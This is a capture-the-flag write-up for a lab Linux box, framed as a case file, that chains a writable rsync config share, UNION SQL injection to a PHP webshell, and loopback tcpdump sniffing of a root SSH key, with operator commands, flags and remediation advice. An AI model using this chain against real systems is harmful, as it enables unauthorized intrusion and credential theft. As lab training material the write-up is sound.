Writable rsync Conf, admin SQLi RCE, and loopback SSH key sniff
Intermediate Linux engagement: anonymous rsync module Conf allowed rewriting webapp.ini prod to dev; Union SQLi on /admin yielded OS shell as tom; tcpdump on lo captured a root SSH private key from an internal service.
- Case files
- Writable rsync Conf, admin SQLi RCE, and loopback SSH key sniff
rsync Conf writable; env=dev unlocked admin; UNION SQLi to webshell; lo sniff recovered root id_rsa.
Pulled/pushed Conf; UNION SQLi to webshell; read user.txt.
tcpdump on lo recovered root private key; SSH as root.
Engagement summary
rsync Conf writable; env=dev unlocked admin; UNION SQLi to webshell; lo sniff recovered root id_rsa.
METAMORPHOSIS (Incognito CTF) exposed HTTP and rsync (873). Listing rsync://TARGET/Conf showed webapp.ini with env = prod, user = tom, and a password field. Pulling the module, flipping env to dev, and pushing webapp.ini back via rsync unlocked /admin (previously 403). The admin username field accepted Union-based SQLi (three columns; 2/3 string-capable). sqlmap --os-shell / INTO OUTFILE webshell delivered command execution; user artifact 4ce794a9d0019c1f684e07556821e0b0 recovered under tom. Privilege escalation: an internal service periodically emitted material on loopback — tcpdump -i lo -A captured a root SSH private key. chmod 600 and ssh -i key root@TARGET yielded root artifact 7ffca2ec63534d165525bf37d91b4ff4. Chain: writable config share to SQLi RCE to local key exfil over lo.
Business impact
Anonymous writable rsync modules are remote config control planes. Dev-mode admin panels with SQLi become RCE. Services that print secrets to localhost still lose them to any local foothold with CAP_NET_RAW / tcpdump — encrypt or use Unix sockets with strict creds.
Rsync config flip and SQLi foothold
Pulled/pushed Conf; UNION SQLi to webshell; read user.txt.
OPERATOR · RSYNC / SQLI
savvy@lab:~$ rsync rsync://10.10.10.10/Conf/
webapp.ini (env = prod)
savvy@lab:~$ # set env = dev; rsync -av webapp.ini rsync://10.10.10.10/Conf/
savvy@lab:~$ # UNION SELECT INTO OUTFILE /var/www/html/cmd.php
savvy@lab:~$ curl -s 'http://10.10.10.10/cmd.php?cmd=id'
uid=...(tom) user.txt recovered
webapp.ini
webapp.ini
[Web_App]
env = dev
user = tom
password = ********Loopback capture to root SSH
tcpdump on lo recovered root private key; SSH as root.
OPERATOR · SNIFF / SSH
savvy@lab:~$ tcpdump -i lo -A -nn -s0 | tee lo.cap
-----BEGIN OPENSSH PRIVATE KEY----- ...
savvy@lab:~$ chmod 600 root_key && ssh -i root_key root@10.10.10.10
root@lab:~# cat /root/root.txt
7ffca2ec63534d165525bf37d91b4ff4
Remediation
Require auth on rsync modules; make Conf read-only from deploy pipelines. Keep admin panels out of prod or behind SSO. Never transmit private keys in cleartext on lo — use ssh-agent / vault-issued short-lived certs. Restrict tcpdump/CAP_NET_RAW.